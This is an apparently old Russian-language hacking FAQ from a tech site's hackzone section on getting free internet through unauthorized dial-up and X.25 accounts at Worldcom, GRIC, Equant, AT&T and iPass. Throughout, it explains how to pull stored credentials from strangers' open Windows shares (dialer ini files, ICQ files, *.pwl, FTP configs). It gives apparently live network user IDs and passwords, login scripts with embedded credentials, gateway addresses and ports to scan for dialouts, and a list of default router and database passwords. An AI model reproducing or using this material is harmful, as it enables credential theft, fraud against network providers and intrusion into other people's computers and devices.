updated: х..ли шифровать, и так все знают =) \progra~1\pal\pal.ini оно как правило лежит =)
(или \progra~1\pal95\pal95.ini или... возможны варианты)
updated: многие вот жалуются, что мол нету нигде этих pal.ini. Hint: на всем известных диапазонах (212.211. и т.д.) на win95-машинах эти файлы мне почему-то попадались крайне редко.
Q. Как мне использовать закрытые для России аккаунты worldcom?
A.Cуществует много вариаций, например:
1)exec shell циски на каком-нибудь из хостов к которым доступ разрешен.
Попав туда набираем: pad 2111855, или pad 3132 (или pad 31329 - точно не помню).
А может, циска уже имеет доступ в инет и можно подсоединиться к telnet гейту набрав скажем telnet 212.211.79.137 4145. В некоторых случаях вам может понадобится установить второе ppp соединение, о чем уже до фига писалось. отсылаю всех к статье eadle
2)попробовать через грик (некоторые домены имеют роуминг по умолчанию.
например таким был @hp.com (hostname hpco), но из-за наплыва халявщиков недавно был закрыт. Однако таких доменов еще немеряно)
3)выходя в уунет через какие-нибудь левые сети (но тут как я писал раньше нужен NUI)
updated: всё равно это уже стало народным достоянием, так что и рассказать об этом не грех. Практически все подобные аккаунты можно использовать через хост wcdial с паролем sr1p.hpf или же запуская ppp не дожидаясь приглашения host name:, то есть скажем не жимкая в РОЛе после захода под [email protected]:
proc main
waitfor "ogin:"
transmit "[email protected]^M"
waitfor "word:"
transmit "[email protected]^M"
endproc
Так можно использовать почти все логины, найденные на ворлдкомовсих диапазонах и не только ;). В pal.ini они как правило хранятся в параметах host_user или
host_pw:
Info #0 : [email protected]
Info #1 : host_pw=28Faz6m7
тогда как следующее - для использования через x.25:
Info #0 : HostName=hpco
Info #1 : UserID=m00108415
Info #2 : Password=28Faz6m7
Q. Как установить второе ppp соединение под *nix?
A.Hужно воспользоваться программой которая может перенаправлять свой ввод и вывод на виртуальный терминал (pty) и настроить pppd на работу с этим самым pty. Пример таких программ - modemu (читаем ее документацию), pty-redir (читаем VPN-howto или mini-howto, не помню уже. там все показано на примере, правда не pppd а ssh)
Q. Какие домены грика до сих пор работают? как мне включить роуминг на [domain]?
A.Работающих (не закрытых для России) доменов осталось очень мало, поэтому ясное дело никто не хочет их светить. попробуйте поискать сами =) список всех провайдеров входящих в консорциум .
Точно также и с включением роуминга - просто там никто не скажет, ищите на сайте провадера сами.
updated. Сейчас с включением роуминга на Россию стало вообще тяжело - по умолчанию его уже не делает вроде никто, и сделать его очень тяжело.
Q. Как узнать ip-диапазоны dialup'а буржуйского провайдера [kewlprovider]?
Я делал очень просто - заходил на irc в очень многопосещаемый канал (типа #usa , или #japan когда речь шла о каком нибудь ocn.ne.jp =)) и просто там висел. Потом просматривая логи joins/parts, можно было видеть что нибудь типа:* ivangovnov ([email protected]) has joined #usa то что нам и надо.
updated. Оказывается даже после этого люди не могут найти эту галку =)
А я уже и вспомнить не могу, где ее когда-то ставил. По моему это в категории IRC не выбирая подкатегорию ставим show addresses и убираем short joins/parts
Q. Можно ли использовать аккаунты грика через x.25 сети?
A.Интересующихся этим вопросом советую скачать GRICdial, там есть довольно интересный скриптик =)
updated: не поленился скачать и вырезать из него то что надо
proc main
transmit "...^M"
waitfor "SITA NETWORK"
transmit "NUI 28700001^M"
waitfor "password"
transmit "H1VW9R^M"
waitfor "active"
transmit "2124172001^M"
waitfor "connected"
endproc
раньше было NUI 51290001 pass fcifhn - сейчас вроде как оно не работает
Q. Как использовать через x.25 аккаунты equant, не работающие на прямых пулах?
A.Можно попробовать (через SITA NETWORK):
NUI 77630001 pass 95p6ip NUA 9003157001 //updated -- этот nui вроде как не пашет
NUI 06040091,pass rffc3r NUA 4444769001 2315777001 2164693002
NUI 95600001,pass ddsmwf NUA 9003153001 9003154001 и тд
updated: ещё пробуйте nui 22421028 pass x4cfuo, nui 79900001 pass 1rg0fv
Q. Как использовать аккаунты AT&T?
A.Раньше работало следующее:
Через IBMNET:
proc main
transmit "*CLR"
waitfor "Please Sign-on:"
transmit "[email protected]^M"
waitfor "Password:"
transmit "569365964^M" - может быть любым.
waitfor "Please Sign-on:"
transmit "ваш аккаунт AT&T,ваш пароль AT&T"
waitfor "}"
endproc
Через INFONET:
proc main
waitfor "ogin:"
transmit "wvpn03*xwnet04^M"
waitfor "assword:"
transmit "wvpn03oz^M"
waitfor "connected"
transmit "^M"
endproc
Сейчас для аккаунтов @worldnet.att.net это вроде не работает (?)
Аккаунты же вида @nbn1.newyorklife.com.ics-ip.att.net можно использовать через инфонет без скрипта, на ibmnet не пробовалось.
updated. Думаю что эту инфу можно уже выкинуть, но... пусть будет на память =)
Q. Как узнать адреса DNS серверов для провайдера [kewlprovider]?
A.Как правило если при установлении ppp соединения удаленная сторона не сообщает вас адреса dns, то в принципе в свойстве соединения можно прописать адреса любых dns серверов. Если все-таки нужны адреса обслуживающие конкретный домен, то:
запускаем nslookup
говорим ей set type=ns
и после этого вводим домен для которого надо узнать адреса, например rosnet.ru
Q. Можно ли использовать аккаунты МТУ не в Москве?
A.В Роснете есть (был?) ppp вход в МТУ Посмотрите nua 600814055 600290504 или поищите по старым публикациям про роснет.
updated: появился и пул в Питере - 3801108
Q. Есть ли гейт inet->[любая x.25 сеть]?
A.В любую x.25 сеть из инета можно попасть через диалаут, которые иногда встречаются на просторах сети (как их искать - читай статью в x25zine#1) без диалаута можно попасть например сюда:
telnet 194.186.138.131 (rol)
telnet 212.211.79.137 4145 (uunet)
telnet x25pad.autonet.net (autonet)
telnet lon.telnet.ja.net (janet)
telnet 192.156.137.139 2600 (вроде SITA)
telnet 194.67.8.161 8099 (SOVAMNET)
Q. Как использовать в России аккаунты ipass?
A.Через РОЛ, добавляя перед логином "IPASS/". например:
IPASS/000066638963044478010#[email protected]
updated. Так уже я думаю хрен вы заюзаете потому что вроде как поставили ограничение на количество подобных входов и теперь все время выкидывает с rad_fss_reply() (в отличие от cu_reply() что значит по данному аккаунту уже кто-то сидит).
Но некоторые аккаунты до сих пор можно использовать через ситу:
nui 37830001 pass 98Z8VJ nua 9001252001 - это "родная" информация, тут возможны варианты.
а вообще вот вам кусок вроде как официальной документации от ipass, вот и разбирайтесь:
Script: sci-w95.scp, Platform: w95
; REV: SZ/2-03-97
; Main entry point to script
;
proc main
integer nTries = 3
delay 2
while nTries > 0 do
transmit "...^M"
waitfor "SITA NETWORK" then DoLogin until 5
nTries = nTries -1
endwhile
; timed out
goto Abort
DoLogin:
delay 2
transmit "NUI 06790263^M"
waitfor "password"
delay 2
transmit "ZERTYB^M"
waitfor "active"
delay 1
transmit "2123140001^M"
waitfor "connected"
goto Done
Abort:
; allow manual completion
set screen keyboard on
halt
Done:
endproc
Script: oze-w95.scp, Platform: w95
-----------------------------------------------------------------
proc main
delay 2
transmit "^M"
waitfor "ervice?"
transmit "P"
transmit "^M"
waitfor "sername:"
transmit $USERID
transmit "^M"
waitfor "assword:"
transmit $PASSWORD
transmit "^M"
delay 2
endproc
Script: uun-w95.scp, Platform: w95
-----------------------------------------------------------------
proc main
integer count = 0
transmit "^M"
delay 1
transmit "^M"
delay 1
transmit "^M"
delay 1
while count < 5 do
transmit "^M"
waitfor "Login:" until 2
if $SUCCESS then
goto DoLogin
endif
count = count + 1
endwhile
halt
DoLogin:
transmit "IPASS/" + $USERID + "^M"
waitfor "Password:"
transmit $PASSWORD + "^M"
waitfor "ppp"
endproc
Script: voy-w95.scp, Platform: w95
-----------------------------------------------------------------
proc main
transmit "^M"
waitfor "service?"
transmit "ppp"
transmit "^M"
waitfor "sername:"
transmit
transmit "^M"
waitfor "assword:"
transmit
transmit "^M"
waitfor "witching"
endproc
updated 23. А где их взять, эти аккаунты ipass?
A.мне они часто попадались на всё том же любимом диапазоне wcom'a:
файл \progra~1\ipass\ipassco~1\userpref.ini, для извлекания пароля - тянем ipassconnect
updated 24. Вот сканерю я, а какие файлы обычно люди с шар тянут?
A. аськины uinы:
\progra~1\icq\2000a\??????.uin
\progra~1\icq\2000b\??????.uin и так далее
конфиги диалеров, например \windows\edialer.ini
\progra~1\ipass\ipassco~1\userpref.ini - ipass
\progra~1\ipass\ipassco~1\ipass.ini - ipass
\progra~1\at&t\wns\user\account.* - at&t dialer, как его там
конфиги ftp клиентов, типа \progra~1\ws_ftp\ws_ftp.ini - там часто можно
обнаружить аккаунт на шелл
ну и про *.pwl и system.ini и так все знают
updated 25. как найти dialout?
A. про это было написано в x25zine#1. вкратце - открытые модемы в основном висят на портах 2001-2012. сканим и ищем =) а еще бывает на 4001-4012 или 6001-6012.
updated 26. Дайте мне диапазоны где сидят диалапщики hp.com, kpmg.com и т.д
A. Нет у них своих диапазонов, потому что это - не провайдеры, а компании занимающиеся более другими делами, а в инете их работники или кто они там, эти люди с аккаунтами, сидят через worldcom, так что и искать их надо там.
updated 27. Как по ситовскому nua определить местоположение?
A. формат адреса:
2 XX X YYY
XXX - код страны, например 270 - Россия.
updated 28. Какие есть пароли по умолчанию на всякие там роутеры?
A.вот некоторые из них (собранные вроде cyberliric'ом)
------
default passwords for BayNetworks equipment
routers(AN AHN ARN) - no passwords as default
workgroup switches - login:Manager
manager/manager
security/security
monitor/monitor
default CISCO routers
password: cisco
(works on 20-30% of hosts )
On 3Com products try SuperStack as password
Security Vulnerability in Motorola CableRouters
The CableRouter leaves an open telnet port at port 1024.
Furthermore, the CableRouter performs absolutely NO logging of
connections - you can connect and never be seen.
Login: cablecom
Password: router
defaul account for many old unixes:
login: sync
with no password
(can be used with LDPRELOAD exploit)
Default Account for MS SQL Server
Username: sa
with no password
InterBase default account
SYSDBA/MASTERKEY
Novell Netware
default accounts - SUPERVISOR, GUEST,
and Netware 4.x has ADMIN and USER_TEMPLATE as well.
All of these have no password to start with.
-----
updated 29. А я слышал, что можно коннектиться к compuserve через Петерлинк
A.У них на сайте лежат скрипты для WinCIM'а но я их не изучал.
updated 30. А как находить расшаренные диски? у меня сканер ничего не находит
A.Это наверное вопрос номер 1 на всех форумах =) хоть он тут и не очень в тему ответим.
Чтобы правильно работал сканер надобно:
чтобы в свойствах соединения с инетом стояла галка "вход в сеть"и были установлены следующие компоненты:
протокол tcp/ip и "контроллер удаленного доступа" (естественно)
клиент для сетей microsoft
и (вроде бы) протокол NetBEUI
updated 31. А некоторые диалеры типа GRICdial хранят всю информацию в реестре.Что делать?
A.Подмонтировать диск и заюзать Registry Viewer - тогда можно будет обойтись без скачиавния всего реестра.
seo & website usability | html | os faq | hardware faq | memory | video | cpu | hdd | mainboard faq | printer & scaner | modem | mobiles | hackzone |
На главную | Cookie policy | Sitemap